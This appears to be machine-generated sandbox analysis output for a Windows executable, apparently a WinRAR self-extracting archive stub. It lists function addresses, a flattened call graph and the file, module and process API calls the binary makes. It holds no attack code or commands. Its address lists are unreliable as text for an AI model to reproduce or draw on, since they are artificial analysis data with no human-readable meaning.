LCMapStringW 26639->26640 26641 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26640->26641 26642 50d0b0 26641->26642 26642->26616 26642->26623 26642->26624 26643->26616 26644->26611 26645->26616 26646->26639 26720 4fb4a0 ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 26672 5010a8 26673 5010b2 26672->26673 26674 500d3a ___delayLoadHelper2@8 14 API calls 26673->26674 26675 5010bf 26674->26675 26677 4e10b5 26678 4e668f 43 API calls 26677->26678 26679 4e10ba 26678->26679 26682 501932 29 API calls 26679->26682 26681 4e10c4 26682->26681 26722 50b150 7 API calls ___scrt_uninitialize_crt 26723 501d50 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26724 50cd50 21 API calls 26726 4f3d49 7 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26792 4f9740 133 API calls 26729 4ff950 70 API calls 26794 50dafe 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26795 4fd361 78 API calls 26733 4fe560 91 API calls 2 library calls 26796 4fea83 132 API calls 5 library calls 26797 4e6b70 41 API calls __EH_prolog3 26799 50531b 38 API calls 4 library calls 26740 500900 14 API calls ___delayLoadHelper2@8 26801 501b00 46 API calls __RTC_Initialize 26742 501d07 29 API calls _abort 26420 50030b 26421 500318 26420->26421 26422 4f0597 53 API calls 26421->26422 26423 500333 26422->26423 26424 4e4c00 _swprintf 51 API calls 26423->26424 26425 500346 SetDlgItemTextW 26424->26425 26426 4fd864 5 API calls 26425->26426 26427 500363 26426->26427 26428 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26427->26428 26429 500378 26428->26429 26743 50e530 GetCommandLineA GetCommandLineW 26803 504f20 6 API calls 4 library calls 24472 501bd2 24473 501bde ___scrt_is_nonwritable_in_current_image 24472->24473 24504 50176c 24473->24504 24475 501be5 24476 501d38 24475->24476 24479 501c0f 24475->24479 24583 501fca 4 API calls 2 library calls 24476->24583 24478 501d3f 24576 50a7aa 24478->24576 24490 501c4e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24479->24490 24515 50b34d 24479->24515 24486 501c2e 24488 501caf 24523 5020e5 GetStartupInfoW __cftof 24488->24523 24490->24488 24579 50a29c 38 API calls _abort 24490->24579 24491 501cb5 24524 50b29e 51 API calls 24491->24524 24494 501cbd 24525 50037c 24494->24525 24498 501cd1 24498->24478 24499 501cd5 24498->24499 24500 501cde 24499->24500 24581 50a74d 28 API calls _abort 24499->24581 24582 5018dd 12 API calls ___scrt_uninitialize_crt 24500->24582 24503 501ce6 24503->24486 24505 501775 24504->24505 24585 501de6 IsProcessorFeaturePresent 24505->24585 24507 501781 24586 50507e 24507->24586 24509 501786 24514 50178a 24509->24514 24594 50b1d7 24509->24594 24512 5017a1 24512->24475 24514->24475 24516 50b364 24515->24516 24517 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24516->24517 24518 501c28 24517->24518 24518->24486 24519 50b2f1 24518->24519 24520 50b320 24519->24520 24521 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24520->24521 24522 50b349 24521->24522 24522->24490 24523->24491 24524->24494 24651 4f290a 24525->24651 24529 5003aa 24707 4fccd9 24529->24707 24531 5003b3 __cftof 24532 5003c6 GetCommandLineW 24531->24532 24533 5003d9 24532->24533 24534 50046a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24532->24534 24711 4fe872 24533->24711 24726 4e4c00 24534->24726 24539 500464 24718 4fffdd 24539->24718 24540 5003e7 OpenFileMappingW 24543 50045b CloseHandle 24540->24543 24544 5003ff MapViewOfFile 24540->24544 24543->24534 24546 500410 __InternalCxxFrameHandler 24544->24546 24547 500454 UnmapViewOfFile 24544->24547 24552 4fffdd 7 API calls 24546->24552 24547->24543 24554 50042c 24552->24554 24553 4fafe6 27 API calls 24555 500546 DialogBoxParamW 24553->24555 24771 4f136b 82 API calls 24554->24771 24560 500580 24555->24560 24557 500440 24772 4f1421 82 API calls _wcslen 24557->24772 24559 50044b 24559->24547 24561 500592 Sleep 24560->24561 24562 500599 24560->24562 24561->24562 24565 5005a7 24562->24565 24756 4fcf89 24562->24756 24564 5005c6 DeleteObject 24566 5005e2 24564->24566 24567 5005db DeleteObject 24564->24567 24565->24564 24568 500613 24566->24568 24570 500625 24566->24570 24567->24566 24773 50004d WaitForSingleObject 24568->24773 24768 4fcd3f 24570->24768 24573 50065f 24574 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24573->24574 24575 500673 24574->24575 24580 50211b GetModuleHandleW 24575->24580 25106 50a527 24576->25106 24579->24488 24580->24498 24581->24500 24582->24503 24583->24478 24585->24507 24598 506127 24586->24598 24590 50508f 24591 50509a 24590->24591 24612 506163 DeleteCriticalSection 24590->24612 24591->24509 24593 505087 24593->24509 24639 50e6aa 24594->24639 24597 50509d 7 API calls 2 library calls 24597->24514 24600 506130 24598->24600 24601 506159 24600->24601 24602 505083 24600->24602 24613 50636c 24600->24613 24618 506163 DeleteCriticalSection 24601->24618 24602->24593 24604 5051ac 24602->24604 24632 50627d 24604->24632 24607 5051c1 24607->24590 24609 5051cf 24610 5051dc 24609->24610 24638 5051df 6 API calls ___vcrt_FlsFree 24609->24638 24610->24590 24612->24593 24619 506192 24613->24619 24616 5063a4 InitializeCriticalSectionAndSpinCount 24617 50638f 24616->24617 24617->24600 24618->24602 24620 5061af 24619->24620 24621 5061b3 24619->24621 24620->24616 24620->24617 24621->24620 24622 50621b GetProcAddress 24621->24622 24625 50620c 24621->24625 24627 506232 LoadLibraryExW 24621->24627 24622->24620 24624 506229 24622->24624 24624->24620 24625->24622 24626 506214 FreeLibrary 24625->24626 24626->24622 24628 506249 GetLastError 24627->24628 24629 506279 24627->24629 24628->24629 24630 506254 ___vcrt_FlsFree 24628->24630 24629->24621 24630->24629 24631 50626a LoadLibraryExW 24630->24631 24631->24621 24633 506192 ___vcrt_FlsFree 5 API calls 24632->24633 24634 506297 24633->24634 24635 5062b0 TlsAlloc 24634->24635 24636 5051b6 24634->24636 24636->24607 24637 50632e 6 API calls ___vcrt_FlsFree 24636->24637 24637->24609 24638->24607 24642 50e6c3 24639->24642 24641 501793 24641->24512 24641->24597 24643 5010f9 24642->24643 24644 501101 24643->24644 24645 501102 IsProcessorFeaturePresent 24643->24645 24644->24641 24647 501314 24645->24647 24650 5012d7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24647->24650 24649 5013f7 24649->24641 24650->24649 24779 501590 24651->24779 24654 4f2999 24656 4f2cda 24654->24656 24795 509e7e 42 API calls __vsnwprintf_l 24654->24795 24655 4f2943 GetProcAddress 24657 4f296d GetProcAddress 24655->24657 24658 4f2955 24655->24658 24660 4f2cdc GetModuleFileNameW 24656->24660 24657->24654 24659 4f297f 24657->24659 24658->24657 24659->24654 24675 4f2cfa 24660->24675 24662 4f2c06 24662->24660 24663 4f2c13 GetModuleFileNameW CreateFileW 24662->24663 24664 4f2ccc CloseHandle 24663->24664 24665 4f2c47 SetFilePointer 24663->24665 24664->24660 24665->24664 24666 4f2c55 ReadFile 24665->24666 24666->24664 24667 4f2c73 24666->24667 24669 4f2ede 24667->24669 24672 4f2c85 24667->24672 24802 5013f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24669->24802 24671 4f2ee3 24672->24664 24677 4f28ab 7 API calls 24672->24677 24674 4f2d5c GetFileAttributesW 24674->24675 24676 4f2d74 24674->24676 24675->24674 24675->24676 24781 4ed076 24675->24781 24786 4f28ab 24675->24786 24678 4f2d7f 24676->24678 24679 4f2db4 24676->24679 24677->24672 24684 4f2d98 GetFileAttributesW 24678->24684 24686 4f2db0 24678->24686 24680 4f2dbc 24679->24680 24681 4f2ec3 24679->24681 24685 4ed076 6 API calls 24680->24685 24682 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24681->24682 24683 4f2ed5 24682->24683 24706 4fc5dd GetCurrentDirectoryW 24683->24706 24684->24678 24684->24686 24687 4f2dce 24685->24687 24686->24679 24688 4f2e3b 24687->24688 24689 4f2dd5 24687->24689 24690 4e4c00 _swprintf 51 API calls 24688->24690 24691 4f28ab 7 API calls 24689->24691 24692 4f2e63 AllocConsole 24690->24692 24693 4f2ddf 24691->24693 24694 4f2ebb ExitProcess 24692->24694 24695 4f2e70 GetCurrentProcessId AttachConsole 24692->24695 24696 4f28ab 7 API calls 24693->24696 24800 506433 24695->24800 24698 4f2de9 24696->24698 24796 4f0597 24698->24796 24699 4f2e91 GetStdHandle WriteConsoleW Sleep FreeConsole 24699->24694 24702 4e4c00 _swprintf 51 API calls 24703 4f2e17 24702->24703 24704 4f0597 53 API calls 24703->24704 24705 4f2e26 24704->24705 24705->24694 24706->24529 24708 4f28ab 7 API calls 24707->24708 24709 4fcced OleInitialize 24708->24709 24710 4fcd10 GdiplusStartup SHGetMalloc 24709->24710 24710->24531 24717 4fe87c 24711->24717 24712 4fe9a0 24713 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24712->24713 24714 4fe9b1 24713->24714 24714->24539 24714->24540 24715 4f4159 CharUpperW 24715->24717 24717->24712 24717->24715 24834 4f1421 82 API calls _wcslen 24717->24834 24719 501590 24718->24719 24720 4fffea SetEnvironmentVariableW 24719->24720 24721 500016 24720->24721 24722 50003e 24721->24722 24725 500032 SetEnvironmentVariableW 24721->24725 24723 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24722->24723 24724 500049 24723->24724 24724->24534 24725->24722 24835 4e4bd3 24726->24835 24729 4fd9dd LoadBitmapW 24730 4fd9fe 24729->24730 24731 4fda0b GetObjectW 24729->24731 24912 4fc652 FindResourceW 24730->24912 24733 4fda1a 24731->24733 24907 4fc556 24733->24907 24737 4fda70 24748 4ef93e 24737->24748 24738 4fda4c 24926 4fc595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24738->24926 24739 4fc652 12 API calls 24741 4fda3d 24739->24741 24741->24738 24743 4fda43 DeleteObject 24741->24743 24742 4fda54 24927 4fc574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24742->24927 24743->24738 24745 4fda5d 24928 4fc79c 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24745->24928 24747 4fda64 DeleteObject 24747->24737 24939 4ef963 24748->24939 24753 4fafe6 25087 50121c 24753->25087 24755 4fb005 24755->24553 24760 4fcf9b 24756->24760 24757 4fd039 24758 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24757->24758 24759 4fd047 24758->24759 24759->24565 24760->24757 25104 4fcbb6 SetCurrentDirectoryW 24760->25104 24762 4fcfde _wcslen 24763 4fd04f 24762->24763 24764 4fd005 __cftof 24762->24764 25105 5013f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24763->25105 24766 4fd018 SHFileOperationW 24764->24766 24766->24757 24767 4fd054 24769 4fcd78 GdiplusShutdown OleUninitialize 24768->24769 24769->24573 24771->24557 24772->24559 24774 500068 24773->24774 24775 5000ad CloseHandle 24773->24775 24776 50006b PeekMessageW 24774->24776 24775->24570 24777 50007d GetMessageW TranslateMessage DispatchMessageW 24776->24777 24778 50009e WaitForSingleObject 24776->24778 24777->24778 24778->24775 24778->24776 24780 4f2914 GetModuleHandleW 24779->24780 24780->24654 24780->24655 24782 4ed09c GetVersionExW 24781->24782 24783 4ed0c9 24781->24783 24782->24783 24784 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24783->24784 24785 4ed0f2 24784->24785 24785->24675 24787 501590 24786->24787 24788 4f28b8 GetSystemDirectoryW 24787->24788 24789 4f28de 24788->24789 24790 4f28fa 24788->24790 24803 4edd18 24789->24803 24791 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24790->24791 24793 4f2906 24791->24793 24793->24675 24795->24662 24797 4f05a7 24796->24797 24807 4f05c8 24797->24807 24801 50643b 24800->24801 24801->24699 24801->24801 24802->24671 24804 4edd22 24803->24804 24805 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24804->24805 24806 4edda6 LoadLibraryW 24805->24806 24806->24790 24813 4ef892 24807->24813 24810 4f05eb LoadStringW 24811 4f05c5 24810->24811 24812 4f0602 LoadStringW 24810->24812 24811->24702 24812->24811 24820 4ef7b8 24813->24820 24816 4ef8d3 24818 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24816->24818 24819 4ef8e8 24818->24819 24819->24810 24819->24811 24821 4ef7e1 24820->24821 24829 4ef85d _strncpy 24820->24829 24825 4ef801 24821->24825 24831 4f3f47 WideCharToMultiByte 24821->24831 24822 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24824 4ef88b 24822->24824 24824->24816 24830 4ef8ec 26 API calls 24824->24830 24828 4ef832 24825->24828 24832 4f0531 50 API calls __vsnprintf 24825->24832 24833 508a01 26 API calls 3 library calls 24828->24833 24829->24822 24830->24816 24831->24825 24832->24828 24833->24829 24834->24717 24836 4e4bea __vsnwprintf_l 24835->24836 24839 508772 24836->24839 24842 506835 24839->24842 24843 506875 24842->24843 24844 50685d 24842->24844 24843->24844 24845 50687d 24843->24845 24859 50bc7b 20 API calls _abort 24844->24859 24861 506dd4 24845->24861 24847 506862 24860 506649 26 API calls _abort 24847->24860 24850 50686d 24852 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24850->24852 24854 4e4bf4 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24852->24854 24854->24729 24855 506905 24870 507184 51 API calls 4 library calls 24855->24870 24858 506910 24871 506e57 20 API calls _free 24858->24871 24859->24847 24860->24850 24862 50688d 24861->24862 24863 506df1 24861->24863 24869 506d9f 20 API calls 2 library calls 24862->24869 24863->24862 24872 50b9a5 GetLastError 24863->24872 24865 506e12 24893 50bf86 38 API calls __fassign 24865->24893 24867 506e2b 24894 50bfb3 38 API calls __fassign 24867->24894 24869->24855 24870->24858 24871->24850 24873 50b9c7 24872->24873 24874 50b9bb 24872->24874 24896 50d786 20 API calls 2 library calls 24873->24896 24895 50d4ab 11 API calls 2 library calls 24874->24895 24877 50b9c1 24877->24873 24879 50ba10 SetLastError 24877->24879 24878 50b9d3 24880 50b9db 24878->24880 24903 50d501 11 API calls 2 library calls 24878->24903 24879->24865 24897 50bafa 24880->24897 24883 50b9f0 24883->24880 24885 50b9f7 24883->24885 24884 50b9e1 24886 50ba1c SetLastError 24884->24886 24904 50b810 20 API calls _abort 24885->24904 24905 50b584 38 API calls _abort 24886->24905 24888 50ba02 24890 50bafa _free 20 API calls 24888->24890 24892 50ba09 24890->24892 24892->24879 24892->24886 24893->24867 24894->24862 24895->24877 24896->24878 24898 50bb2e __dosmaperr 24897->24898 24899 50bb05 RtlFreeHeap 24897->24899 24898->24884 24899->24898 24900 50bb1a 24899->24900 24906 50bc7b 20 API calls _abort 24900->24906 24902 50bb20 GetLastError 24902->24898 24903->24883 24904->24888 24906->24902 24929 4fc574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24907->24929 24909 4fc55d 24910 4fc569 24909->24910 24930 4fc595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24909->24930 24910->24737 24910->24738 24910->24739 24913 4fc763 24912->24913 24914 4fc675 SizeofResource 24912->24914 24913->24731 24913->24733 24914->24913 24915 4fc68c LoadResource 24914->24915 24915->24913 24916 4fc6a1 LockResource 24915->24916 24916->24913 24917 4fc6b2 GlobalAlloc 24916->24917 24917->24913 24918 4fc6cd GlobalLock 24917->24918 24919 4fc75c GlobalFree 24918->24919 24920 4fc6dc __InternalCxxFrameHandler 24918->24920 24919->24913 24921 4fc755 GlobalUnlock 24920->24921 24931 4fc5b6 GdipAlloc 24920->24931 24921->24919 24924 4fc72a GdipCreateHBITMAPFromBitmap 24925 4fc740 24924->24925 24925->24921 24926->24742 24927->24745 24928->24747 24929->24909 24930->24910 24932 4fc5c8 24931->24932 24933 4fc5d5 24931->24933 24935 4fc34d 24932->24935 24933->24921 24933->24924 24933->24925 24936 4fc36e GdipCreateBitmapFromStreamICM 24935->24936 24937 4fc375 GdipCreateBitmapFromStream 24935->24937 24938 4fc37a 24936->24938 24937->24938 24938->24933 24940 4ef975 24939->24940 24941 4ef9cb GetModuleFileNameW 24940->24941 24942 4ef9f8 24940->24942 24943 4ef9df 24941->24943 24993 4eb2b0 24942->24993 24943->24942 24945 4efa47 25006 508bc0 24945->25006 24948 4f01bd 78 API calls 24952 4efa1b 24948->24952 24950 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24953 4ef94a 24950->24953 24951 4efa5a 24954 508bc0 26 API calls 24951->24954 24952->24945 24952->24948 24979 4efc4f 24952->24979 24991 4f01fa GetModuleHandleW FindResourceW 24953->24991 24957 4efa6c ___vcrt_FlsFree 24954->24957 24962 4efb92 24957->24962 24957->24979 25020 4eb8c0 24957->25020 25036 4eb610 24957->25036 25041 4eb7b0 81 API calls 24957->25041 24959 4efba9 ___std_exception_copy 24960 4eb610 82 API calls 24959->24960 24959->24979 24963 4efbcf ___std_exception_copy 24960->24963 24962->24979 25042 4eb7b0 81 API calls 24962->25042 24963->24979 24989 4efbda _wcslen ___std_exception_copy ___vcrt_FlsFree 24963->24989 25043 4f3d10 MultiByteToWideChar 24963->25043 24966 4effed 24984 4efd76 24966->24984 25046 50b52e 26 API calls 2 library calls 24966->25046 24967 4f00b6 25050 509ea8 26 API calls 2 library calls 24967->25050 24969 4f015c 24974 508bc0 26 API calls 24969->24974 24970 4f0126 24970->24969 24973 4f01bd 78 API calls 24970->24973 24972 4f010e 25051 4f01d8 78 API calls 24972->25051 24973->24970 24976 4f0175 24974->24976 24977 508bc0 26 API calls 24976->24977 24977->24979 25029 4eaf2f 24979->25029 24980 4f000c 25047 509ea8 26 API calls 2 library calls 24980->25047 24981 4f0064 25048 4f01d8 78 API calls 24981->25048 24982 4f3f47 WideCharToMultiByte 24982->24989 24984->24970 25049 50b52e 26 API calls 2 library calls 24984->25049 24985 4f01b7 25052 5013f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24985->25052 24987 4f01bc 24989->24966 24989->24979 24989->24982 24989->24984 24989->24985 25044 4f0531 50 API calls __vsnprintf 24989->25044 25045 508a01 26 API calls 3 library calls 24989->25045 24992 4ef951 24991->24992 24992->24753 24994 4eb2ba 24993->24994 24995 4eb334 CreateFileW 24994->24995 24996 4eb34f GetLastError 24995->24996 24997 4eb39b 24995->24997 25053 4eda1e 24996->25053 25002 4eb3c5 SetFileTime 24997->25002 25003 4eb3df 24997->25003 25000 4eb370 CreateFileW GetLastError 25000->24997 25001 4eb395 25000->25001 25001->24997 25002->25003 25004 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25003->25004 25005 4eb41e 25004->25005 25005->24952 25007 508bf9 25006->25007 25008 508bfd 25007->25008 25019 508c25 25007->25019 25059 50bc7b 20 API calls _abort 25008->25059 25010 508c02 25060 506649 26 API calls _abort 25010->25060 25011 508f49 25013 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25011->25013 25015 508f56 25013->25015 25014 508c0d 25016 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25014->25016 25015->24951 25017 508c19 25016->25017 25017->24951 25019->25011 25061 508ae0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25019->25061 25021 4eb8d2 25020->25021 25026 4eb8e5 25020->25026 25023 4eb8f0 25021->25023 25062 4e7cd8 77 API calls 25021->25062 25022 4eb8f8 SetFilePointer 25022->25023 25025 4eb914 GetLastError 25022->25025 25023->24957 25025->25023 25027 4eb91e 25025->25027 25026->25022 25026->25023 25027->25023 25063 4e7cd8 77 API calls 25027->25063 25030 4eaf5d 25029->25030 25035 4eaf6e 25029->25035 25031 4eaf69 25030->25031 25032 4eaf70 25030->25032 25030->25035 25064 4eb11a 25031->25064 25069 4eafd0 25032->25069 25035->24950 25037 4eb61c 25036->25037 25038 4eb623 25036->25038 25037->24957 25038->25037 25040 4eb151 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25038->25040 25086 4e7c95 77 API calls 25038->25086 25040->25038 25041->24957 25042->24959 25043->24989 25044->24989 25045->24989 25046->24980 25047->24981 25048->24984 25049->24967 25050->24972 25051->24970 25052->24987 25056 4eda28 _wcslen 25053->25056 25054 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25055 4eb36c 25054->25055 25055->24997 25055->25000 25057 4edaf7 GetCurrentDirectoryW 25056->25057 25058 4eda6f _wcslen 25056->25058 25057->25058 25058->25054 25059->25010 25060->25014 25061->25019 25062->25026 25063->25023 25065 4eb14d 25064->25065 25066 4eb123 25064->25066 25065->25035 25066->25065 25075 4ebc65 25066->25075 25070 4eaffa 25069->25070 25071 4eafdc 25069->25071 25072 4eb019 25070->25072 25085 4e7b49 76 API calls 25070->25085 25071->25070 25073 4eafe8 FindCloseChangeNotification 25071->25073 25072->25035 25073->25070 25076 501590 25075->25076 25077 4ebc72 DeleteFileW 25076->25077 25078 4ebcb9 25077->25078 25079 4ebc91 25077->25079 25080 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25078->25080 25081 4eda1e 6 API calls 25079->25081 25082 4eb14b 25080->25082 25083 4ebca3 25081->25083 25082->25035 25083->25078 25084 4ebca7 DeleteFileW 25083->25084 25084->25078 25085->25072 25086->25038 25088 501221 ___std_exception_copy 25087->25088 25089 50123b 25088->25089 25091 50123d 25088->25091 25102 50a2ec 7 API calls 2 library calls 25088->25102 25089->24755 25092 4e4adb Concurrency::cancel_current_task 25091->25092 25094 501247 25091->25094 25100 5047d0 RaiseException 25092->25100 25103 5047d0 RaiseException 25094->25103 25095 4e4af7 25097 4e4b0d 25095->25097 25101 4e13db 26 API calls Concurrency::cancel_current_task 25095->25101 25097->24755 25098 501de0 25100->25095 25101->25097 25102->25088 25103->25098 25104->24762 25105->24767 25107 50a533 _abort 25106->25107 25108 50a53a 25107->25108 25109 50a54c 25107->25109 25142 50a681 GetModuleHandleW 25108->25142 25130 50d281 EnterCriticalSection 25109->25130 25112 50a53f 25112->25109 25143 50a6c5 GetModuleHandleExW 25112->25143 25117 50a63a 25152 5149b0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25117->25152 25118 50a60e 25134 50a640 25118->25134 25122 50b2f1 _abort 5 API calls 25128 50a5e0 25122->25128 25123 50b2f1 _abort 5 API calls 25129 50a5f1 25123->25129 25124 50a553 25126 50a5c8 25124->25126 25124->25129 25151 50b040 20 API calls _abort 25124->25151 25126->25122 25126->25128 25128->25123 25131 50a631 25129->25131 25130->25124 25153 50d2d1 LeaveCriticalSection 25131->25153 25133 50a60a 25133->25117 25133->25118 25154 50d6c6 25134->25154 25137 50a66e 25140 50a6c5 _abort 8 API calls 25137->25140 25138 50a64e GetPEB 25138->25137 25139 50a65e GetCurrentProcess TerminateProcess 25138->25139 25139->25137 25141 50a676 ExitProcess 25140->25141 25142->25112 25144 50a712 25143->25144 25145 50a6ef GetProcAddress 25143->25145 25146 50a721 25144->25146 25147 50a718 FreeLibrary 25144->25147 25149 50a704 25145->25149 25148 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25146->25148 25147->25146 25150 50a54b 25148->25150 25149->25144 25150->25109 25151->25126 25153->25133 25155 50d6e1 25154->25155 25156 50d6eb 25154->25156 25158 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25155->25158 25160 50d2e8 25156->25160 25159 50a64a 25158->25159 25159->25137 25159->25138 25161 50d318 25160->25161 25165 50d314 25160->25165 25161->25155 25162 50d338 25162->25161 25164 50d344 GetProcAddress 25162->25164 25166 50d354 _abort 25164->25166 25165->25161 25165->25162 25167 50d384 25165->25167 25166->25161 25168 50d3a5 LoadLibraryExW 25167->25168 25173 50d39a 25167->25173 25169 50d3c2 GetLastError 25168->25169 25170 50d3da 25168->25170 25169->25170 25171 50d3cd LoadLibraryExW 25169->25171 25172 50d3f1 FreeLibrary 25170->25172 25170->25173 25171->25170 25172->25173 25173->25165 26806 50a7c0 52 API calls 3 library calls 26807 501bc0 27 API calls 26750 5155c0 VariantClear 26809 4fc3d0 GdipCloneImage GdipAlloc 26810 4fb3d0 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26751 4f11eb FreeLibrary 26752 5029e0 51 API calls 2 library calls 26815 4fea83 122 API calls 5 library calls 26754 514590 CloseHandle 26817 4fd384 GetDlgItem KiUserCallbackDispatcher ShowWindow SendMessageW 26755 502580 LocalFree 26414 500782 26415 500686 26414->26415 26416 500d3a ___delayLoadHelper2@8 14 API calls 26415->26416 26416->26415 26430 4ff191 26431 4ff19a GetTempPathW 26430->26431 26448 4fea83 _wcslen _wcsrchr 26430->26448 26439 4ff1ba 26431->26439 26433 4e4c00 _swprintf 51 API calls 26433->26439 26434 4ff717 26435 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26434->26435 26437 4ff732 26435->26437 26436 4ebccb 8 API calls 26436->26439 26473 5013f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26437->26473 26438 4ff1ee SetDlgItemTextW 26443 4ff209 26438->26443 26438->26448 26439->26433 26439->26436 26439->26438 26441 4ff741 26442 4fed57 SetWindowTextW 26442->26448 26443->26437 26445 4ff2fd EndDialog 26443->26445 26443->26448 26445->26448 26446 4edd18 5 API calls 26446->26448 26448->26434 26448->26437 26448->26442 26448->26446 26449 5066ae 22 API calls 26448->26449 26451 4feb4b SetFileAttributesW 26448->26451 26464 4feb65 __cftof _wcslen 26448->26464 26466 4fc5dd GetCurrentDirectoryW 26448->26466 26468 4ec3de 11 API calls 26448->26468 26469 4ec367 FindClose 26448->26469 26470 4fd76e 76 API calls 3 library calls 26448->26470 26472 4fd5dd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26448->26472 26449->26448 26453 4fec05 GetFileAttributesW 26451->26453 26451->26464 26453->26448 26454 4fec17 DeleteFileW 26453->26454 26454->26448 26457 4fec28 26454->26457 26459 4e4c00 _swprintf 51 API calls 26457->26459 26458 4fef35 GetDlgItem SetWindowTextW SendMessageW 26458->26464 26460 4fec48 GetFileAttributesW 26459->26460 26460->26457 26462 4fec5d MoveFileW 26460->26462 26461 4fef75 SendMessageW 26461->26448 26462->26448 26463 4fec75 MoveFileExW 26462->26463 26463->26448 26464->26448 26464->26461 26465 4febe1 SHFileOperationW 26464->26465 26467 4ed8ac 51 API calls 2 library calls 26464->26467 26471 4fd41c 100 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26464->26471 26465->26453 26466->26448 26467->26464 26468->26448 26469->26448 26470->26448 26471->26458 26472->26448 26473->26441 26819 4eaf90 80 API calls Concurrency::cancel_current_task 26820 4fc390 GdipDisposeImage GdipFree 26647 4e21a5 26648 4e21b8 26647->26648 26649 4e21b0 26647->26649 26651 50121c 27 API calls 26648->26651 26652 4e21b6 26648->26652 26653 4e21ca 27 API calls Concurrency::cancel_current_task 26649->26653 26651->26652 26653->26652 26759 5011bf 48 API calls _unexpected 26760 4fcda0 73 API calls 26659 4eb9ba 26660 4eb9cf 26659->26660 26661 4eb9c8 26659->26661 26662 4eb9dc GetStdHandle 26660->26662 26669 4eb9eb 26660->26669 26662->26669 26663 4eba43 WriteFile 26663->26669 26664 4eba0f 26665 4eba14 WriteFile 26664->26665 26664->26669 26665->26664 26665->26669 26667 4ebad5 26671 4e7e45 77 API calls 26667->26671 26669->26661 26669->26663 26669->26664 26669->26665 26669->26667 26670 4e7b1e 78 API calls 26669->26670 26670->26669 26671->26661

                                        Executed Functions

                                        Function 0050037C Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 208filesleeptimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004F290A: GetModuleHandleW.KERNEL32 ref: 004F2937
                                          • Part of subcall function 004F290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004F2949
                                          • Part of subcall function 004F290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004F2973
                                          • Part of subcall function 004FC5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004FC5E5
                                          • Part of subcall function 004FCCD9: OleInitialize.OLE32(00000000), ref: 004FCCF2
                                          • Part of subcall function 004FCCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004FCD29
                                          • Part of subcall function 004FCCD9: SHGetMalloc.SHELL32(0052C460), ref: 004FCD33
                                        • GetCommandLineW.KERNEL32 ref: 005003C9
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 005003F3
